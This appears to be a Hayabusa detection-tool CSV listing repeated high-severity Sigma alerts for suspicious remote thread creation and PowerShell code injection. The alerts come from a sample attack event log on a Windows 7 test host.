2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
